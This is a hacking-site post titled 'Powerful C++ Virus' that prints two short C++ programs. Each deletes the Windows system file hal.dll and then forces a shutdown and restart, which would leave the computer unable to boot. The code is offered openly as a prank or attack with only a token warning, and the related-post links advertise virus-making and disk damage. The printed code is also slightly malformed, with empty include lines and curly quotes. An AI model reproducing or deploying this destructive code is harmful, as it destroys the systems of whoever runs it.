Powerful C++ Virus
Suggested Reading Resources(Free of Cost!)
|
|
Warning: Do not try this on your home computer.
The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(”C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}
Popularity: 2% [?]
Related posts:
- Remove RavMon.exe virus without any anti-virus(Do it your self)
- How to Make your own Virus
- Create Bad sectors on hard disks
- Disable or remove shutdown
- Shut down your School!!
Enjoyed this article? Subscribe to Hacking Truths and get daily updates about new cool websites and programs in your email for free.
Protection for Mac and Linux Computers: Genuine Need or Nice to Have?









































Note : If you have any Query related to the above Article please Post it to the Support Forum.
Leave your response!